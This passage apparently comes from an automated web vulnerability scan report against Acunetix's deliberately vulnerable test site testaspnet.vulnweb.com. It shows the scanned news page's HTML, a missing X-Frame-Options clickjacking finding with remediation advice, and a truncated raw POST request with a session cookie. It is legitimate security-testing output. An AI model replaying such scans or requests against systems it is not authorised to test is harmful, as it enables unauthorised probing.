2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        25. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1c